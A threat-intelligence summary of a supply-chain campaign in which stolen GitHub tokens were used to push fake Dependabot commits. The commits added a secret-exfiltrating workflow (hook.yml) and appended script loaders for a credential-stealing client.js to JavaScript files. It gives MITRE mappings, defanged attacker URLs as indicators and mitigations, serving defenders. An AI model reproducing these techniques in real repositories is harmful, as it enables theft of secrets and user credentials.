Keypoints
- Attackers stole GitHub personal access tokens (PATs) from developers’ environments and used them to authenticate and push malicious changes.
- Malicious commits were crafted to appear as Dependabot contributions (author “dependabot[bot]”) to avoid scrutiny.
- An added GitHub Actions workflow file (hook.yml) exfiltrated repository secrets and variables to hxxps://send[.]wagateway.pro/webhook on push events.
- Attackers appended an obfuscated line to every *.js file to inject a script tag loading hxxps://send[.]wagateway.pro/client.js which intercepts and exfiltrates web form credentials.
- The campaign targeted hundreds of repositories (public and private), was automated, and likely began after PATs were exfiltrated from compromised development machines (possibly via malicious packages).
- Visibility into PAT usage is limited for non‑enterprise GitHub accounts, hindering detection of this kind of abuse.
- Mitigations include rotating to fine‑grained PATs, auditing workflow files and recent diffs, and scanning for unexpected external script loads in served JS.
MITRE Techniques
- [T1078] Valid Accounts – Use of stolen GitHub personal access tokens to authenticate and push malicious commits (‘victims’ GitHub personal access token was stolen and used by the attackers to contribute those malicious code contributions.’).
- [T1036] Masquerading – Impersonation of Dependabot by fabricating commit author/commit messages to evade review (‘The attackers created a commit message “fix” appear to be contributed by user account “dependabot[bot]”’).
- [T1195] Supply Chain Compromise – Modifying repositories (workflows and source files) to distribute malicious code to downstream users (‘modified every existing project file having the “*.js“ extension and append an obfuscated line’).
- [T1567.002] Exfiltration Over Web Service – Workflow sends repository secrets/variables to a remote webhook at hxxps://send[.]wagateway.pro/webhook (‘sends GitHub secrets and variables to URL hxxps://send[.]wagateway.pro/webhook’).
- [T1059.007] Command and Scripting Interpreter: JavaScript – Appending obfuscated JavaScript to *.js files that loads remote client.js to intercept form credentials (‘load an additional script from this URL: hxxps://send[.]wagateway.pro/client.js?cache=ignore’).
Indicators of Compromise
- [Domain] Exfiltration / C2 endpoint – wagateway[.]pro
- [URL] Exfiltration and credential‑stealing scripts – hxxps://send[.]wagateway[.]pro/webhook, hxxps://send[.]wagateway[.]pro/client.js
- [File name] Malicious workflow added to repositories – hook.yml
- [File modification] Appended obfuscated JavaScript to web assets – *.js files appended with script loader to client.js
- [Repository examples] Observed malicious commits in repositories – highpolar-softwares/I-help-privacy-policy, juniorriau/kejaribiak
In affected projects the technical flow was: a developer’s GitHub personal access token (stored locally for git operations) was exfiltrated (likely via a compromised development environment or malicious package). The attacker used those PATs to authenticate to GitHub, fabricate commits that appeared to come from “dependabot[bot],” and push automated changes across many repositories.
The pushed changes consisted of two coordinated payloads: (1) a new GitHub Actions workflow file (hook.yml) that triggers on push and collects repository secrets/variables, sending them to hxxps://send[.]wagateway.pro/webhook; and (2) an obfuscated line appended to every *.js file which injects a script tag that loads hxxps://send[.]wagateway.pro/client.js?cache=ignore. The client.js payload intercepts web form submissions in the browser and posts harvested credentials back to the same webhook endpoint.
Detection is hampered because fake Dependabot commits can bypass casual review and PAT usage/audit visibility is limited for non‑enterprise accounts. Practical technical mitigations include rotating to GitHub fine‑grained personal access tokens with least privilege, auditing new/modified workflow files and recent diffs (especially hook.yml), scanning served JS for unexpected external script loads, and monitoring for suspicious commit authorship and unusual push activity from developer accounts.
Read more: https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/